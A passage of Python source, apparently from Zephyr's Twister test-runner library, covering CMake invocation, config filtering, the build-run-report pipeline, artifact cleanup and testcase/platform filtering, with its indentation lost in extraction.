results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "error"
self.instance.reason = "Cmake build failure"
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a") as log:
log_msg = out.decode(sys.getdefaultencoding())
log.write(log_msg)
return results
@staticmethod
def run_cmake_script(args=[]):
logger.debug("Running cmake script %s" % (args[0]))
cmake_args = ["-D{}".format(a.replace('"', '')) for a in args[1:]]
cmake_args.extend(['-P', args[0]])
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
if not cmake:
msg = "Unable to find `cmake` in path"
logger.error(msg)
raise Exception(msg)
cmd = [cmake] + cmake_args
kwargs = dict()
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
msg = "Finished running %s" % (args[0])
logger.debug(msg)
results = {"returncode": p.returncode, "msg": msg, "stdout": out}
else:
logger.error("Cmake script failure: %s" % (args[0]))
results = {"returncode": p.returncode}
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-twister.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(edt_pickle):
with open(edt_pickle, 'rb') as f:
edt = pickle.load(f)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.filtered_tests = 0
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.ubsan = kwargs.get('ubsan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
self.warnings_as_errors = kwargs.get('warnings_as_errors', True)
self.overflow_as_errors = kwargs.get('overflow_as_errors', False)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.ubsan = self.ubsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif instance.platform.simulation == "tsim":
instance.handler = BinaryHandler(instance, "tsim")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
instance.handler.coverage = self.coverage
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "mdb-nsim":
if find_executable("mdb"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.pid_fn = os.path.join(instance.build_dir, "mdb.pid")
instance.handler.call_west_flash = True
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
def process(self, pipeline, done, message, lock, results):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
res = self.cmake()
if self.instance.status in ["failed", "error"]:
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
if self.instance.status is None:
self.instance.status = "passed"
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in res['filter'] and res['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
results.skipped_runtime += 1
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
res = self.build()
if not res:
self.instance.status = "error"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
# Count skipped cases during build, for example
# due to ram/rom overflow.
inst = res.get("instance", None)
if inst and inst.status == "skipped":
results.skipped_runtime += 1
if res.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.run and self.instance.handler:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
logger.debug(f"run status: {self.instance.name} {self.instance.status}")
# to make it work with pickle
self.instance.handler.thread = None
self.instance.handler.suite = None
pipeline.put({
"op": "report",
"test": self.instance,
"status": self.instance.status,
"reason": self.instance.reason
}
)
# Report results and output progress to screen
elif op == "report":
with lock:
done.put(self.instance)
self.report_out(results)
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
if self.device_testing:
self.cleanup_device_testing_artifacts()
else:
self.cleanup_artifacts()
def cleanup_artifacts(self, additional_keep=[]):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
allow = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
allow += additional_keep
allow = [os.path.join(self.instance.build_dir, file) for file in allow]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in allow:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def cleanup_device_testing_artifacts(self):
logger.debug("Cleaning up for Device Testing {}".format(self.instance.build_dir))
sanitizelist = [
'CMakeCache.txt',
'zephyr/runners.yaml',
]
keep = [
'zephyr/zephyr.hex',
'zephyr/zephyr.bin',
'zephyr/zephyr.elf',
]
keep += sanitizelist
self.cleanup_artifacts(keep)
# sanitize paths so files are relocatable
for file in sanitizelist:
file = os.path.join(self.instance.build_dir, file)
with open(file, "rt") as fin:
data = fin.read()
data = data.replace(canonical_zephyr_base+"/", "")
with open(file, "wt") as fin:
fin.write(data)
def report_out(self, results):
total_to_do = results.total - results.skipped_configs
total_tests_width = len(str(total_to_do))
results.done += 1
instance = self.instance
if instance.status in ["error", "failed", "timeout"]:
if instance.status == "error":
results.error += 1
results.failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
elif instance.status == "passed":
status = Fore.GREEN + "PASSED" + Fore.RESET
else:
logger.debug(f"Unknown status = {instance.status}")
status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
results.done, total_tests_width, total_to_do, instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["error", "failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
completed_perc = 0
if total_to_do > 0:
completed_perc = int((float(results.done) / total_to_do) * 100)
skipped = results.skipped_configs + results.skipped_runtime
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
results.done,
total_to_do,
Fore.RESET,
completed_perc,
Fore.YELLOW if skipped > 0 else Fore.RESET,
skipped,
Fore.RESET,
Fore.RED if results.failed > 0 else Fore.RESET,
results.failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if os.path.exists(os.path.join(instance.build_dir,
"twister", "testcase_extra.conf")):
overlays.append(os.path.join(instance.build_dir,
"twister", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
res = self.run_cmake(args)
return res
def build(self):
res = self.run_build(['--build', self.build_dir])
return res
def run(self):
instance = self.instance
if instance.handler:
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "testcase-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_allow": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"integration_platforms": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_allow": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_allow": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "release",
"twister_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
self.warnings_as_errors = True
self.overflow_as_errors = False
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.platforms = []
self.selected_platforms = []
self.filtered_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
# hardcoded for now
self.duts = []
# run integration tests only
self.integration = False
self.pipeline = None
self.version = "NA"
def check_zephyr_version(self):
try:
subproc = subprocess.run(["git", "describe", "--abbrev=12"],
stdout=subprocess.PIPE,
universal_newlines=True,
cwd=ZEPHYR_BASE)
if subproc.returncode == 0:
self.version = subproc.stdout.strip()
logger.info(f"Zephyr version: {self.version}")
except OSError:
logger.info("Cannot read zephyr version.")
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + "/")}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update_counting(self, results=None, initial=False):
results.skipped_configs = 0
results.skipped_cases = 0
for instance in self.instances.values():
if initial:
results.cases += len(instance.testcase.cases)
if instance.status == 'skipped':
results.skipped_configs += 1
results.skipped_cases += len(instance.testcase.cases)
elif instance.status == "passed":
results.passed += 1
for res in instance.results.values():
if res == 'SKIP':
results.skipped_cases += 1
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.error("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def footprint_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
logger.debug("running footprint_reports")
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = 0
if value > delta:
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage < (footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, results, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if instance.metrics.get('handler_time', None):
run += 1
if results.total and results.total != results.skipped_configs:
pass_rate = (float(results.passed) / float(results.total - results.skipped_configs))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} test configurations passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
results.passed,
results.total - results.skipped_configs,
Fore.RESET,
pass_rate,
Fore.RED if results.failed else Fore.RESET,
results.failed,
Fore.RESET,
results.skipped_configs,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
# if we are only building, do not report about tests being executed.
if self.platforms and not self.build_only:
logger.info("In total {} test cases were executed, {} skipped on {} out of total {} platforms ({:02.2f}%)".format(
results.cases - results.skipped_cases,
results.skipped_cases,
len(self.filtered_platforms),
self.total_platforms,
(100 * len(self.filtered_platforms) / len(self.platforms))
))
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} test configurations executed on platforms, \
{Fore.RED}{results.total - run - results.skipped_configs}{Fore.RESET} test configurations were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed, platform_reports, json_report):
if not self.instances:
return
logger.info("Saving reports...")
if name:
report_name = name
else:
report_name = "twister"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False,
append=only_failed, version=self.version)
self.xunit_report(filename + "_report.xml", full_report=True,
append=only_failed, version=self.version)
self.csv_report(filename + ".csv")
if json_report:
self.json_report(filename + ".json", append=only_failed, version=self.version)
if platform_reports:
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
try:
platform = Platform()
platform.load(file)
if platform.name in [p.name for p in self.platforms]:
logger.error(f"Duplicate platform {platform.name} in {file}")
raise Exception(f"Duplicate platform identifier {platform.name} found")
if platform.twister:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain_script = Path(ZEPHYR_BASE) / Path('cmake/verify-toolchain.cmake')
result = CMake.run_cmake_script([toolchain_script, "FORMAT=json"])
try:
if result['returncode']:
raise TwisterRuntimeError("E: Variable ZEPHYR_TOOLCHAIN_VARIANT is not defined")
except Exception as e:
print(str(e))
sys.exit(2)
toolchain = json.loads(result['stdout'])['ZEPHYR_TOOLCHAIN_VARIANT']
logger.info(f"Using '{toolchain}' toolchain.")
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, dirnames, filenames in os.walk(root, topdown=True):
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
dirnames[:] = []
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = TwisterConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_allow = tc_dict["arch_allow"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_allow = tc_dict["platform_allow"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_allow = tc_dict["toolchain_allow"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.integration_platforms = tc_dict["integration_platforms"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
return len(self.testcases)
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_from_file(self, file, filter_status=[], filter_platform=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
if filter_platform and platform.name not in filter_platform:
continue
instance = TestInstance(self.testcases[test], platform, self.outdir)
if self.device_testing:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
runnable = kwargs.get('runnable')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
emu_filter = kwargs.get('emulation_only')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
emulation_platforms = False
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all used, any --platform arguments ignored
platform_filter = []
elif not platform_filter and not emu_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
elif emu_filter:
logger.info("Selecting emulation platforms per test case")
emulation_platforms = True
if platform_filter:
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
elif emu_filter:
platforms = list(filter(lambda p: p.simulation != 'na', self.platforms))
elif arch_filter:
platforms = list(filter(lambda p: p.arch in arch_filter, self.platforms))
elif default_platforms:
platforms = list(filter(lambda p: p.default, self.platforms))
else:
platforms = self.platforms
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
if tc.build_on_all and not platform_filter:
platform_scope = self.platforms
elif tc.integration_platforms and self.integration:
platform_scope = list(filter(lambda item: item.name in tc.integration_platforms, \
self.platforms))
else:
platform_scope = platforms
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platform_scope:
instance = TestInstance(tc, plat, self.outdir)
if runnable:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
for t in tc.cases:
instance.results[t] = None
if runnable and self.duts:
for h in self.duts:
if h.platform == plat.name:
if tc.harness_config.get('fixture') in h.fixtures:
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = discards.get(instance, "Platform is excluded on command line.")
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if runnable and not instance.run:
discards[instance] = discards.get(instance, "Not runnable on device")
if self.integration and tc.integration_platforms and plat.name not in tc.integration_platforms:
discards[instance] = discards.get(instance, "Not part of integration platforms")
if tc.skip:
discards[instance] = discards.get(instance, "Skip filter")
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = discards.get(instance, "Command line testcase tag filter")
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = discards.get(instance, "Command line testcase exclude filter")
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = discards.get(instance, "Testcase name filter")
if arch_filter and plat.arch not in arch_filter:
discards[instance] = discards.get(instance, "Command line testcase arch filter")
if not force_platform:
if tc.arch_allow and plat.arch not in tc.arch_allow:
discards[instance] = discards.get(instance, "Not in test case arch allow list")
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = discards.get(instance, "In test case arch exclude")
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = discards.get(instance, "In test case platform exclude")
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = discards.get(instance, "In test case toolchain exclude")
if platform_filter and plat.name not in platform_filter:
discards[instance] = discards.get(instance, "Command line platform filter")
if tc.platform_allow and plat.name not in tc.platform_allow:
discards[instance] = discards.get(instance, "Not in testcase platform allow list")
if tc.toolchain_allow and toolchain not in tc.toolchain_allow:
discards[instance] = discards.get(instance, "Not in testcase toolchain allow list")
if not plat.env_satisfied:
discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and tc.type != 'unit':
discards[instance] = discards.get(instance, "Not supported by the toolchain")
if plat.ram < tc.min_ram:
discards[instance] = discards.get(instance, "Not enough RAM")
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = discards.get(instance, "No hardware support")
if plat.flash < tc.min_flash:
discards[instance] = discards.get(instance, "Not enough FLASH")
if set(plat.ignore_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")
if plat.only_tags and not set(plat.only_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
integration = self.integration and tc.integration_platforms
# if twister was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all and not integration:
if tc.platform_allow:
a = set(self.default_platforms)
b = set(tc.platform_allow)
c = a.intersection(b)
if c:
aa = list(filter(lambda tc: tc.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list[:1])
else:
instances = list(filter(lambda tc: tc.platform.default, instance_list))
self.add_instances(instances)
elif integration:
instances = list(filter(lambda item: item.platform.name in tc.integration_platforms, instance_list))
self.add_instances(instances)
elif emulation_platforms:
self.add_instances(instance_list)
for instance in list(filter(lambda inst: not inst.platform.simulation != 'na', instance_list)):
discards[instance] = discards.get(instance, "Not an emulated platform")
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
for instance in self.discards:
instance.reason = self.discards[instance]
instance.status = "skipped"
instance.fill_results_by_status()
self.filtered_platforms = set(p.platform.name for p in self.instances.values()
if p.status != "skipped" )
return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
@staticmethod
def calc_one_elf_size(instance):
if instance.status not in ["error", "failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
def add_tasks_to_queue(self, pipeline, build_only=False, test_only=False):
for instance in self.instances.values():
if build_only:
instance.run = False
if test_only and instance.run:
pipeline.put({"op": "run", "test": instance})
else:
if instance.status not in ['passed', 'skipped', 'error']:
